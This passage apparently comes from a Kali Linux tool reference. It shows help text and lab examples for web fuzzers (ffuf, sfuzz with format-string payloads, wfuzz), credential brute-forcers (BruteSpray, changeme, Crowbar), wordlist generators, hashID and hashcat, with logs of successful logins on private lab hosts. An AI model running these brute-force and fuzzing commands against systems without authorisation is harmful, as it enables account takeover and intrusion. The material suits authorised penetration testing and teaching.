-input-shell Shell to be used for running command
-mode Multi-wordlist operation mode. Available modes: clusterbomb, pitchfork, sniper (default: clusterbomb)
-request File containing the raw http request
-request-proto Protocol to use along with raw request (default: https)
-w Wordlist file path and (optional) keyword separated by colon. eg. '/path/to/wordlist:KEYWORD'
OUTPUT OPTIONS:
-debug-log Write all of the internal logging to the specified file.
-o Write output to file
-od Directory path to store matched results to.
-of Output file format. Available formats: json, ejson, html, md, csv, ecsv (or, 'all' for all formats) (default: json)
-or Don't create the output file if we don't have results (default: false)
■ Usage example
root@kali:~# ffuf -w words.txt -u http://192.168.11.4/FUZZ/
[...]
________________________________________________
:: Method : GET
:: URL : http://192.168.11.4/FUZZ/
:: Wordlist : FUZZ: words.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
[...]
rss [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 4841ms]
wp-content [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 29ms]
admin [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 175ms]
other [Status: 200, Size: 86813, Words: 2396, Lines: 264, Duration: 1484ms]
guide [Status: 200, Size: 86813, Words: 2396, Lines: 264, Duration: 708ms]
storage [Status: 200, Size: 86823, Words: 2396, Lines: 264, Duration: 1318ms]
rss2 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 265ms]
bottom [Status: 200, Size: 86815, Words: 2396, Lines: 264, Duration: 1504ms]
wp-includes [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 1ms]
website [Status: 200, Size: 86823, Words: 2396, Lines: 264, Duration: 1519ms]
exec [Status: 200, Size: 86805, Words: 2396, Lines: 264, Duration: 1161ms]
rdf [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 134ms]
page1 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 374ms]
Other [Status: 200, Size: 86813, Words: 2396, Lines: 264, Duration: 1192ms]
building [Status: 200, Size: 86828, Words: 2396, Lines: 264, Duration: 1640ms]
[...]
:: Progress: [87664/87664] :: Job [1/1] :: 43 req/sec :: Duration: [0:40:53] :: Errors: 0 ::
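Most of the status 200 hits above share 2396 words and 264 lines while differing by a few bytes in size, which is the usual shape of a catch-all page that answers every path; in ffuf the fix is `-fw 2396` or `-ac`. As an added example (not part of the original post or of ffuf), this Python snippet applies the same calibration idea to the result lines printed above and keeps only the hits that do not match the dominant response shape:

```python
"""Separate real ffuf hits from catch-all (wildcard) responses.

Added example, not part of the original post or of ffuf itself. It applies
the idea behind ffuf's -ac / -fw / -fl options to the text lines ffuf prints:
2xx responses sharing the word and line count of the dominant group are
almost certainly one "not found" page served with status 200.
"""
import re
from collections import Counter

# Constructed sample: the result lines from the ffuf run above.
SAMPLE_RESULTS = """\
rss [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 4841ms]
wp-content [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 29ms]
admin [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 175ms]
other [Status: 200, Size: 86813, Words: 2396, Lines: 264, Duration: 1484ms]
guide [Status: 200, Size: 86813, Words: 2396, Lines: 264, Duration: 708ms]
storage [Status: 200, Size: 86823, Words: 2396, Lines: 264, Duration: 1318ms]
rss2 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 265ms]
bottom [Status: 200, Size: 86815, Words: 2396, Lines: 264, Duration: 1504ms]
wp-includes [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 1ms]
website [Status: 200, Size: 86823, Words: 2396, Lines: 264, Duration: 1519ms]
exec [Status: 200, Size: 86805, Words: 2396, Lines: 264, Duration: 1161ms]
rdf [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 134ms]
page1 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 374ms]
Other [Status: 200, Size: 86813, Words: 2396, Lines: 264, Duration: 1192ms]
building [Status: 200, Size: 86828, Words: 2396, Lines: 264, Duration: 1640ms]
"""

# Shape of one ffuf default-output result line.
LINE_RE = re.compile(
    r"^(?P<path>\S+)\s+\[Status: (?P<status>\d+), Size: (?P<size>\d+), "
    r"Words: (?P<words>\d+), Lines: (?P<lines>\d+), Duration: (?P<ms>\d+)ms\]"
)


def parse_results(text):
    """Parse ffuf result lines into dicts; lines that do not match are skipped."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            hits.append({
                "path": d["path"], "status": int(d["status"]), "size": int(d["size"]),
                "words": int(d["words"]), "lines": int(d["lines"]), "ms": int(d["ms"]),
            })
    return hits


def catchall_signature(hits, min_share=0.4):
    """Return (status, words, lines) of the dominant 2xx response shape, or None.

    Size is deliberately left out: the catch-all pages above differ by a few
    bytes because the requested path is echoed into the page, so word and line
    counts are the stable fingerprint (which is why ffuf has -fw/-fl next to -fs).
    A shape only counts as catch-all if it makes up at least min_share of 2xx hits.
    """
    shapes = Counter(
        (h["status"], h["words"], h["lines"]) for h in hits if 200 <= h["status"] < 300
    )
    if not shapes:
        return None
    sig, n = shapes.most_common(1)[0]
    return sig if n / sum(shapes.values()) >= min_share else None


def filter_catchall(hits):
    """Drop hits matching the catch-all signature, like rerunning with -fw/-fl."""
    sig = catchall_signature(hits)
    if sig is None:
        return hits
    return [h for h in hits if (h["status"], h["words"], h["lines"]) != sig]


if __name__ == "__main__":
    hits = parse_results(SAMPLE_RESULTS)
    print("catch-all signature (status, words, lines):", catchall_signature(hits))
    for h in filter_catchall(hits):
        print(f"{h['path']:<12} {h['status']} words={h['words']} lines={h['lines']}")
```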
simple fuzz
Performs fuzzing tests based on a test configuration file.
■ Usage
root@kali:~# sfuzz -h
Build-prefix: /usr
-h This message.
-V Version information.
networking / output:
-v Verbose output
-q Silent output mode (generally for CLI fuzzing)
-X prints the output in hex
-b Begin fuzzing at the test specified.
-e End testing on failure.
-t Wait time for reading the socket
-S Remote host
-p Port
-T|-U|-O TCP|UDP|Output mode
-R Refrain from closing connections (ie: "leak" them)
-f Config File
-L Log file
-n Create a new logfile after each fuzz
-r Trim the tailing newline
-D Define a symbol and value (X=y).
-l Only perform literal fuzzing
-s Only perform sequence fuzzing
■ Usage example
# Create the test configuration file
root@kali:~# cat > sfuzz.config << EOF
sequence=A
sequence=%n
sequence=%#123456x
sequence=%s
sequence=%%s
sequence=%20s
sequence=%%20s
sequence=%20x
sequence=%%20x
sequence=%n%n%n%n%n
sequence=%p%p%p%p%p
sequence=%x%x%x%x%x
sequence=%d%d%d%d%d
sequence=%s%s%s%s%s
sequence=%s%p%x%d
sequence=%.1024d
sequence=%.1025d
sequence=%.2048d
sequence=%.2049d
sequence=%.4096d
sequence=%.4097d
sequence=%99999999999s
sequence=%08x
sequence=%%20d
sequence=%%20n
sequence=%%20x
sequence=%%20s
sequence=%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
reqwait=200
maxseqlen=10024
endcfg
GET /FUZZ HTTP/1.0
--
GET / HTTP/1.1
Host: FUZZ
--
EOF
root@kali:~# sfuzz -S 192.168.11.4 -p 80 -T -f sfuzz.config
[...]
[03:53:44] attempting fuzz - 1 (len: 10040).
[03:53:44] info: tx fuzz - (10040 bytes) - scanning for reply.
[03:53:44] read:
HTTP/1.1 414 Request-URI Too Large
Date: Tue, 12 Nov 2024 03:53:44 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 331
Connection: close
Content-Type: text/html; charset=iso-8859-1
[...]
===============================================================================
[03:53:44] attempting fuzz - 2 (len: 10040).
[03:53:44] info: tx fuzz - (10040 bytes) - scanning for reply.
[03:53:45] read:
HTTP/1.1 414 Request-URI Too Large
Date: Tue, 12 Nov 2024 03:53:44 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 331
Connection: close
Content-Type: text/html; charset=iso-8859-1
[...]
===============================================================================
[03:53:55] attempting fuzz - 56 (len: 10047).
[03:53:55] info: tx fuzz - (10047 bytes) - scanning for reply.
[03:53:56] read:
HTTP/1.1 400 Bad Request
Date: Tue, 12 Nov 2024 03:53:55 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
[...]
Wfuzz
Performs fuzzing tests with the specified payloads.
■ Usage
root@kali:~# wfuzz --help
Usage: wfuzz [options] -z payload,params <url>
FUZZ, ..., FUZnZ wherever you put these keywords wfuzz will replace them with the values of the specified payload.
FUZZ{baseline_value} FUZZ will be replaced by baseline_value. It will be the first request performed and could be used as a base for filtering.
Options:
-h/--help : This help
--help : Advanced help
--filter-help : Filter language specification
--version : Wfuzz version details
-e <type> : List of available encoders/payloads/iterators/printers/scripts
--recipe <filename> : Reads options from a recipe. Repeat for various recipes.
--dump-recipe <filename> : Prints current options as a recipe
--oF <filename> : Saves fuzz results to a file. These can be consumed later using the wfuzz payload.
-c : Output with colors
-v : Verbose information.
-f filename,printer : Store results in the output file using the specified printer (raw printer if omitted).
-o printer : Show results using the specified printer.
--interact : (beta) If selected,all key presses are captured. This allows you to interact with the program.
--dry-run : Print the results of applying the requests without actually making any HTTP request.
--prev : Print the previous HTTP requests (only when using payloads generating fuzzresults)
--efield <expr> : Show the specified language expression together with the current payload. Repeat for various fields.
--field <expr> : Do not show the payload but only the specified language expression. Repeat for various fields.
-p addr : Use Proxy in format ip:port:type. Repeat option for using various proxies.
Where type could be SOCKS4,SOCKS5 or HTTP if omitted.
-t N : Specify the number of concurrent connections (10 default)
-s N : Specify time delay between requests (0 default)
-R depth : Recursive path discovery being depth the maximum recursion level.
-D depth : Maximum link depth level.
-L,--follow : Follow HTTP redirections
--ip host:port : Specify an IP to connect to instead of the URL's host in the format ip:port
-Z : Scan mode (Connection errors will be ignored).
--req-delay N : Sets the maximum time in seconds the request is allowed to take (CURLOPT_TIMEOUT). Default 90.
--conn-delay N : Sets the maximum time in seconds the connection phase to the server to take (CURLOPT_CONNECTTIMEOUT). Default 90.
-A, --AA, --AAA : Alias for -v -c and --script=default,verbose,discover respectively
--no-cache : Disable plugins cache. Every request will be scanned.
--script= : Equivalent to --script=default
--script=<plugins> : Runs script's scan. <plugins> is a comma separated list of plugin-files or plugin-categories
--script-help=<plugins> : Show help about scripts.
--script-args n1=v1,... : Provide arguments to scripts. ie. --script-args grep.regex="<A href=\"(.*?)\">"
-u url : Specify a URL for the request.
-m iterator : Specify an iterator for combining payloads (product by default)
-z payload : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder].
A list of encoders can be used, ie. md5-sha1. Encoders can be chained, ie. md5@sha1.
Encoders category can be used. ie. url
Use help as a payload to show payload plugin's details (you can filter using --slice)
--zP <params> : Arguments for the specified payload (it must be preceded by -z or -w).
--zD <default> : Default parameter for the specified payload (it must be preceded by -z or -w).
--zE <encoder> : Encoder for the specified payload (it must be preceded by -z or -w).
--slice <filter> : Filter payload's elements using the specified expression. It must be preceded by -z.
-w wordlist : Specify a wordlist file (alias for -z file,wordlist).
-V alltype : All parameters bruteforcing (allvars and allpost). No need for FUZZ keyword.
-X method : Specify an HTTP method for the request, ie. HEAD or FUZZ
-b cookie : Specify a cookie for the requests. Repeat option for various cookies.
-d postdata : Use post data (ex: "id=FUZZ&catalogue=1")
-H header : Use header (ex:"Cookie:id=1312321&user=FUZZ"). Repeat option for various headers.
--basic/ntlm/digest auth : in format "user:pass" or "FUZZ:FUZZ" or "domain\FUZ2Z:FUZZ"
--hc/hl/hw/hh N[,N]+ : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--sc/sl/sw/sh N[,N]+ : Show responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--ss/hs regex : Show/hide responses with the specified regex within the content
--filter <filter> : Show/hide responses using the specified filter expression (Use BBB for taking values from baseline)
--prefilter <filter> : Filter items before fuzzing using the specified expression. Repeat for concatenating filters.
■ Usage example
# Scan for files under the 2024/01/01 to 2024/12/31 directories using a list of file names
root@kali:~# wfuzz --filter "c=200" \
-z range --zD 01-12 \
-z range --zD 01-31 \
-z file,db-backups.txt \
-u http://192.168.11.4/2024/FUZZ/FUZ2Z/FUZ3Z
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.11.4/2024/FUZZ/FUZ2Z/FUZ3Z
Total requests: 124992
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000093854: 200 1 L 5 W 128 Ch "10 - 01 - backup.sql.tar.gz"
Bruteforcing and Credential Stuffing
BruteSpray
Brute-force checks a variety of services for default credentials.
[Supported services]
- ssh
- ftp
- telnet
- mssql
- postgresql
- imap
- pop3
- smbnt
- smtp
- snmp
- mysql
- vmauthd
- vnc
- mongodb
- nntp
- asterisk
- teamspeak
- oracle
- xmpp
- rdp
■ Usage
root@kali:~# brutespray --help
Usage of brutespray:
-C string
Specify a combo wordlist deiminated by ':', example: user1:password
-H string
Target in the format service://host:port, CIDR ranges supported,
default port will be used if not specified
-P Print found hosts parsed from provided host and file arguments
-S List all supported services
-T int
Number of hosts to bruteforce at the same time (default 5)
-f string
File to parse; Supported: Nmap, Nessus, Nexpose, Lists, etc
-o string
Directory containing successful attempts (default "brutespray-output")
-p string
Password or password file to use for bruteforce
-q Suppress the banner
-r int
Amount of times to retry after receiving connection failed (default 3)
-s string
Service type: ssh, ftp, smtp, etc; Default all (default "all")
-t int
Number of threads to use (default 10)
-u string
Username or user list to bruteforce
-w duration
Set timeout of bruteforce attempts (default 5s)
■ Usage example
# Write the port scan results to a file
root@kali:~# nmap -oX /root/out.xml 192.168.11.3
[...]
PORT STATE SERVICE
3306/tcp open mysql
[...]
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
# Run the brute-force attack based on the port scan results
root@kali:~# brutespray -f /root/out.xml -u /root/wordlist/user.txt -p /root/wordlist/password.txt -t 5
[...]
Attempt mysql on host 192.168.11.3 port 3306 with username admin and password austin1 failed
Attempt mysql on host 192.168.11.3 port 3306 with username admin and password crazy1 failed
Attempt mysql SUCCESS on host 192.168.11.3 port 3306 with username admin and password pass succeeded
Attempt mysql on host 192.168.11.3 port 3306 with username admin and password kristina failed
Attempt mysql on host 192.168.11.3 port 3306 with username admin and password tiger1 failed
[...]
CeWL
Collects words from a given site and builds a word list for use with password-cracking tools and the like.
■ Usage
root@kali:~# cewl --help
Usage: cewl [OPTIONS] ... <url>
OPTIONS:
-h, --help: Show help.
-k, --keep: Keep the downloaded file.
-d <x>,--depth <x>: Depth to spider to, default 2.
-m, --min_word_length: Minimum word length, default 3.
-x, --max_word_length: Maximum word length, default unset.
-o, --offsite: Let the spider visit other sites.
--exclude: A file containing a list of paths to exclude
--allowed: A regex pattern that path must match to be followed
-w, --write: Write the output to the file.
-u, --ua <agent>: User agent to send.
-n, --no-words: Don't output the wordlist.
-g <x>, --groups <x>: Return groups of words as well
--lowercase: Lowercase all parsed words
--with-numbers: Accept words with numbers in as well as just letters
--convert-umlauts: Convert common ISO-8859-1 (Latin-1) umlauts (ä-ae, ö-oe, ü-ue, ß-ss)
-a, --meta: include meta data.
--meta_file file: Output file for meta data.
-e, --email: Include email addresses.
--email_file <file>: Output file for email addresses.
--meta-temp-dir <dir>: The temporary directory used by exiftool when parsing files, default /tmp.
-c, --count: Show the count for each word found.
-v, --verbose: Verbose.
--debug: Extra debug information.
Authentication
--auth_type: Digest or basic.
--auth_user: Authentication username.
--auth_pass: Authentication password.
Proxy Support
--proxy_host: Proxy host.
--proxy_port: Proxy port, default 8080.
--proxy_username: Username for proxy, if required.
--proxy_password: Password for proxy, if required.
Headers
--header, -H: In format name:value - can pass multiple.
<url>: The site to spider.
■ Usage example
# Build a list of 4-digit numbers from the specified site
root@kali:~# cewl --min_word_length 4 --max_word_length 4 --with-numbers --depth 0 https://suujikotoba.com/4keta/ | awk '/^[[:digit:]]+$/' | sort > words.txt
root@kali:~# head -n 10 words.txt
0000
0005
0009
0010
0014
0019
0024
0026
0030
0039
[...]
changeme
Brute-force checks a variety of services for default credentials.
■ Usage
root@kali:~# changeme --help
usage: changeme.py [-h] [--all] [--category CATEGORY] [--contributors] [--debug] [--delay DELAY] [--dump] [--dryrun] [--fingerprint] [--fresh]
[--log LOG] [--mkcred] [--name NAME] [--noversion] [--proxy PROXY] [--output OUTPUT] [--oa] [--protocols PROTOCOLS]
[--portoverride] [--redishost REDISHOST] [--redisport REDISPORT] [--resume] [--shodan_query SHODAN_QUERY]
[--shodan_key SHODAN_KEY] [--ssl] [--threads THREADS] [--timeout TIMEOUT] [--useragent USERAGENT] [--validate] [--verbose]
target
positional arguments:
target Target to scan. Can be IP, subnet, hostname, nmap xml file, text file or proto://host:port
options:
-h, --help show this help message and exit
--all, -a Scan for all protocols
--category CATEGORY, -c CATEGORY
Category of default creds to scan for
--contributors Display cred file contributors
--debug, -d Debug output
--delay DELAY, -dl DELAY
Specify a delay in milliseconds to avoid 429 status codes default=500
--dump Print all of the loaded credentials
--dryrun Print urls to be scan, but don't scan them
--fingerprint, -f Fingerprint targets, but don't check creds
--fresh Flush any previous scans and start fresh
--log LOG, -l LOG Write logs to logfile
--mkcred Make cred file
--name NAME, -n NAME Narrow testing to the supplied credential name
--noversion Don't perform a version check
--proxy PROXY, -p PROXY
HTTP(S) Proxy
--output OUTPUT, -o OUTPUT
Name of result file. File extension determines type (csv, html, json).
--oa Output results files in csv, html and json formats
--protocols PROTOCOLS
Comma separated list of protocols to test: http,ssh,ssh_key. Defaults to http.
--portoverride Scan all protocols on all specified ports
--redishost REDISHOST
Redis server
--redisport REDISPORT
Redis server
--resume, -r Resume previous scan
--shodan_query SHODAN_QUERY, -q SHODAN_QUERY
Shodan query
--shodan_key SHODAN_KEY, -k SHODAN_KEY
Shodan API key
--ssl Force cred to SSL and fall back to non-SSL if an SSLError occurs
--threads THREADS, -t THREADS
Number of threads, default=10
--timeout TIMEOUT Timeout in seconds for a request, default=10
--useragent USERAGENT, -ua USERAGENT
User agent string to use
--validate Validate creds files
--verbose, -v Verbose output
■ Usage example
root@kali:~# changeme 192.168.11.4 --all
Loaded 123 default credential profiles
Loaded 398 default credentials
[00:09:28] [+] Found ftp default cred anonymous:None at ftp://192.168.11.4:21
[00:09:28] [+] Found ftp default cred ftp:ftp at ftp://192.168.11.4:21
[00:10:49] Found 2 default credentials
Name Username Password Target Evidence
------ ---------- ---------- ------------------- ----------------------
ftp anonymous ftp://192.168.11.4:21 226 Directory send OK.
ftp ftp ftp ftp://192.168.11.4:21 226 Directory send OK.
Crowbar
Performs brute-force attacks against RDP (Remote Desktop), OpenVPN, VNC and SSH private-key authentication to identify credentials.
■ Usage
root@kali:~# crowbar --help
positional arguments:
options
options:
-h, --help show this help message and exit
-b {openvpn,rdp,sshkey,vnckey}, --brute {openvpn,rdp,sshkey,vnckey}
Target service
-s SERVER, --server SERVER
Static target
-S SERVER_FILE, --serverfile SERVER_FILE
Multiple targets stored in a file
-u USERNAME [USERNAME ...], --username USERNAME [USERNAME ...]
Static name to login with
-U USERNAME_FILE, --usernamefile USERNAME_FILE
Multiple names to login with, stored in a file
-n THREAD, --number THREAD
Number of threads to be active at once
-l FILE, --log FILE Log file (only write attempts)
-o FILE, --output FILE
Output file (write everything else)
-c PASSWD, --passwd PASSWD
Static password to login with
-C FILE, --passwdfile FILE
Multiple passwords to login with, stored in a file
-t TIMEOUT, --timeout TIMEOUT
[SSH] How long to wait for each thread (seconds)
-p PORT, --port PORT Alter the port if the service is not using the default value
-k KEY_FILE, --keyfile KEY_FILE
[SSH/VNC] (Private) Key file or folder containing multiple files
-m CONFIG, --config CONFIG
[OpenVPN] Configuration file
-d, --discover Port scan before attacking open ports
-v, --verbose Enable verbose output (-vv for more)
-D, --debug Enable debug mode
-q, --quiet Only display successful logins
■ Usage example
# Brute-force RDP logins to the specified host using username and password lists
root@kali:~# crowbar -b rdp -U /root/user.txt -C /root/pass.txt -s 192.168.11.4/32 -v
2024-09-22 06:56:25 START
2024-09-22 06:56:25 Crowbar v0.4.2
2024-09-22 06:56:25 Brute Force Type: rdp
2024-09-22 06:56:25 Output File: /crowbar.out
2024-09-22 06:56:25 Log File: /crowbar.log
2024-09-22 06:56:25 Discover Mode: False
2024-09-22 06:56:25 Verbose Mode: 1
2024-09-22 06:56:25 Debug Mode: False
2024-09-22 06:56:25 Trying 192.168.11.4:3389
2024-09-22 06:56:25 LOG-RDP: 192.168.11.4:3389 - foo:admin
2024-09-22 06:56:25 LOG-RDP: 192.168.11.4:3389 - foo:test
2024-09-22 06:56:25 LOG-RDP: 192.168.11.4:3389 - foo:p@ssw0rd
2024-09-22 06:56:25 LOG-RDP: 192.168.11.4:3389 - bar:admin
2024-09-22 06:56:25 LOG-RDP: 192.168.11.4:3389 - bar:test
2024-09-22 06:56:26 LOG-RDP: 192.168.11.4:3389 - bar:p@ssw0rd
2024-09-22 06:56:26 LOG-RDP: 192.168.11.4:3389 - hello:admin
2024-09-22 06:56:26 LOG-RDP: 192.168.11.4:3389 - hello:p@ssw0rd
2024-09-22 06:56:26 LOG-RDP: 192.168.11.4:3389 - hello:test
2024-09-22 06:56:28 RDP-SUCCESS : 192.168.11.4:3389 - hello:p@ssw0rd
2024-09-22 06:56:28 STOP
crunch
Generates a word list from a specified character set.
■ Usage
root@kali:~# man crunch
SYNOPSIS
crunch <min-len> <max-len> [<charset string>] [options]
OPTIONS
-b number[type]
Specifies the size of the output file, only works if -o START is used, i.e.: 60MB The output files will be in the format of
starting letter-ending letter for example: ./crunch 4 5 -b 20mib -o START will generate 4 files: aaaa-gvfed.txt, gvfee-ombqy.txt,
ombqz-wcydt.txt, wcydu-zzzzz.txt valid values for type are kb, mb, gb, kib, mib, and gib. The first three types are based on
1000 while the last three types are based on 1024. NOTE There is no space between the number and type. For example 500mb is
correct 500 mb is NOT correct.
-c number
Specifies the number of lines to write to output file, only works if -o START is used, i.e.: 60 The output files will be in the
format of starting letter-ending letter for example: ./crunch 1 1 -f /pentest/password/crunch/charset.lst mixalpha-numeric-all-
space -o START -c 60 will result in 2 files: a-7.txt and 8-\ .txt The reason for the slash in the second filename is the ending
character is space and ls has to escape it to print it. Yes you will need to put in the \ when specifying the filename because
the last character is a space.
-d numbersymbol
Limits the number of duplicate characters. -d 2@ limits the lower case alphabet to output like aab and aac. aaa would not be
generated as that is 3 consecutive letters of a. The format is number then symbol where number is the maximum number of consecutive
characters and symbol is the symbol of the the character set you want to limit i.e. @,%^ See examples 17-19.
-e string
Specifies when crunch should stop early
-f /path/to/charset.lst charset-name
Specifies a character set from the charset.lst
-i Inverts the output so instead of aaa,aab,aac,aad, etc you get aaa,baa,caa,daa,aba,bba, etc
-l When you use the -t option this option tells crunch which symbols should be treated as literals. This will allow you to use the
placeholders as letters in the pattern. The -l option should be the same length as the -t option. See example 15.
-m Merged with -p. Please use -p instead.
-o wordlist.txt
Specifies the file to write the output to, eg: wordlist.txt
-p charset OR -p word1 word2 ...
Tells crunch to generate words that don't have repeating characters. By default crunch will generate a wordlist size of
#of_chars_in_charset ^ max_length. This option will instead generate #of_chars_in_charset!. The ! stands for factorial. For
example say the charset is abc and max length is 4.. Crunch will by default generate 3^4 = 81 words. This option will instead
generate 3! = 3x2x1 = 6 words (abc, acb, bac, bca, cab, cba). THIS MUST BE THE LAST OPTION! This option CANNOT be used with -s
and it ignores min and max length however you must still specify two numbers.
-q filename.txt
Tells crunch to read filename.txt and permute what is read. This is like the -p option except it gets the input from filename.txt.
-r Tells crunch to resume generate words from where it left off. -r only works if you use -o. You must use the same command as the
original command used to generate the words. The only exception to this is the -s option. If your original command used the -s
option you MUST remove it before you resume the session. Just add -r to the end of the original command.
-s startblock
Specifies a starting string, eg: 03god22fs
-t @,%^
Specifies a pattern, eg: @@god@@@@ where the only the @'s, ,'s, %'s, and ^'s will change.
@ will insert lower case characters
, will insert upper case characters
% will insert numbers
^ will insert symbols
-u
The -u option disables the printpercentage thread. This should be the last option.
-z gzip, bzip2, lzma, and 7z
Compresses the output from the -o option. Valid parameters are gzip, bzip2, lzma, and 7z.
gzip is the fastest but the compression is minimal. bzip2 is a little slower than gzip but has better compression. 7z is slowest
but has the best compression.
■ Usage example
# Generate a list of 8-character strings using only digits in the specified pattern
root@kali:~# crunch 8 8 -f /usr/share/crunch/charset.lst numeric -o words.txt -t @@-@@@@@
Crunch will now generate the following amount of data: 90000000 bytes
85 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 10000000
root@kali:~# head -n 5 words.txt
00-00000
00-00001
00-00002
00-00003
00-00004
root@kali:~# tail -n 5 words.txt
99-99995
99-99996
99-99997
99-99998
99-99999
hashID
Identifies hashes of many different types.
■ Usage
root@kali:~# hashid --help
usage: hashid.py [-h] [-e] [-m] [-j] [-o FILE] [--version] INPUT
positional arguments:
INPUT input to analyze (default: STDIN)
options:
-e, --extended list all possible hash algorithms including salted passwords
-m, --mode show corresponding Hashcat mode in output
-j, --john show corresponding JohnTheRipper format in output
-o FILE, --outfile FILE write output to file
-h, --help show this help message and exit
--version show program's version number and exit
■ Example
root@kali:~# hashid '$P$BjlfCiZ7mwif9qwdfpsfDGn5C9tR4I0'
Analyzing '$P$BjlfCiZ7mwif9qwdfpsfDGn5C9tR4I0'
[+] Wordpress ≥ v2.6.2
[+] Joomla ≥ v2.5.18
[+] PHPass' Portable Hash
hashcat
Cracks password hashes.
■ Usage
root@kali:~# hashcat --help
Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...
- [ Options ] -
Options Short / Long | Type | Description | Example
================================+======+======================================================+=======================
-m, --hash-type | Num | Hash-type, references below (otherwise autodetect) | -m 1000
-a, --attack-mode | Num | Attack-mode, see references below | -a 3
-V, --version | | Print version |
-h, --help | | Print help |
--quiet | | Suppress output |
--hex-charset | | Assume charset is given in hex |
--hex-salt | | Assume salt is given in hex |
--hex-wordlist | | Assume words in wordlist are given in hex |
--force | | Ignore warnings |
--deprecated-check-disable | | Enable deprecated plugins |
--status | | Enable automatic update of the status screen |
--status-json | | Enable JSON format for status output |
--status-timer | Num | Sets seconds between status screen updates to X | --status-timer=1
--stdin-timeout-abort | Num | Abort if there is no input from stdin for X seconds | --stdin-timeout-abort=300
--machine-readable | | Display the status view in a machine-readable format |
--keep-guessing | | Keep guessing the hash after it has been cracked |
--self-test-disable | | Disable self-test functionality on startup |
--loopback | | Add new plains to induct directory |
--markov-hcstat2 | File | Specify hcstat2 file to use | --markov-hcstat2=my.hcstat2
--markov-disable | | Disables markov-chains, emulates classic brute-force |
--markov-classic | | Enables classic markov-chains, no per-position |
--markov-inverse | | Enables inverse markov-chains, no per-position |
-t, --markov-threshold | Num | Threshold X when to stop accepting new markov-chains | -t 50
--runtime | Num | Abort session after X seconds of runtime | --runtime=10
--session | Str | Define specific session name | --session=mysession
--restore | | Restore session from --session |
--restore-disable | | Do not write restore file |
--restore-file-path | File | Specific path to restore file | --restore-file-path=x.restore
-o, --outfile | File | Define outfile for recovered hash | -o outfile.txt
--outfile-format | Str | Outfile format to use, separated with commas | --outfile-format=1,3
--outfile-autohex-disable | | Disable the use of $HEX[] in output plains |
--outfile-check-timer | Num | Sets seconds between outfile checks to X | --outfile-check-timer=30
--wordlist-autohex-disable | | Disable the conversion of $HEX[] from the wordlist |
-p, --separator | Char | Separator char for hashlists and outfile | -p :
--stdout | | Do not crack a hash, instead print candidates only |
--show | | Compare hashlist with potfile; show cracked hashes |
--left | | Compare hashlist with potfile; show uncracked hashes |
--username | | Enable ignoring of usernames in hashfile |
--remove | | Enable removal of hashes once they are cracked |
--remove-timer | Num | Update input hash file each X seconds | --remove-timer=30
--potfile-disable | | Do not write potfile |
--potfile-path | File | Specific path to potfile | --potfile-path=my.pot
--encoding-from | Code | Force internal wordlist encoding from X | --encoding-from=iso-8859-15
--encoding-to | Code | Force internal wordlist encoding to X | --encoding-to=utf-32le
--debug-mode | Num | Defines the debug mode (hybrid only by using rules) | --debug-mode=4
--debug-file | File | Output file for debugging rules | --debug-file=good.log
--induction-dir | Dir | Specify the induction directory to use for loopback | --induction=inducts
--outfile-check-dir | Dir | Specify the outfile directory to monitor for plains | --outfile-check-dir=x
--logfile-disable | | Disable the logfile |
--hccapx-message-pair | Num | Load only message pairs from hccapx matching X | --hccapx-message-pair=2
--nonce-error-corrections | Num | The BF size range to replace AP's nonce last bytes | --nonce-error-corrections=16
--keyboard-layout-mapping | File | Keyboard layout mapping table for special hash-modes | --keyb=german.hckmap
--truecrypt-keyfiles | File | Keyfiles to use, separated with commas | --truecrypt-keyf=x.png
--veracrypt-keyfiles | File | Keyfiles to use, separated with commas | --veracrypt-keyf=x.txt
--veracrypt-pim-start | Num | VeraCrypt personal iterations multiplier start | --veracrypt-pim-start=450
--veracrypt-pim-stop | Num | VeraCrypt personal iterations multiplier stop | --veracrypt-pim-stop=500
-b, --benchmark | | Run benchmark of selected hash-modes |
--benchmark-all | | Run benchmark of all hash-modes (requires -b) |
--speed-only | | Return expected speed of the attack, then quit |
--progress-only | | Return ideal progress step size and time to process |
-c, --segment-size | Num | Sets size in MB to cache from the wordfile to X | -c 32
--bitmap-min | Num | Sets minimum bits allowed for bitmaps to X | --bitmap-min=24
--bitmap-max | Num | Sets maximum bits allowed for bitmaps to X | --bitmap-max=24
--cpu-affinity | Str | Locks to CPU devices, separated with commas | --cpu-affinity=1,2,3
--hook-threads | Num | Sets number of threads for a hook (per compute unit) | --hook-threads=8
--hash-info | | Show information for each hash-mode |
--example-hashes | | Alias of --hash-info |
--backend-ignore-cuda | | Do not try to open CUDA interface on startup |
--backend-ignore-hip | | Do not try to open HIP interface on startup |
--backend-ignore-metal | | Do not try to open Metal interface on startup |
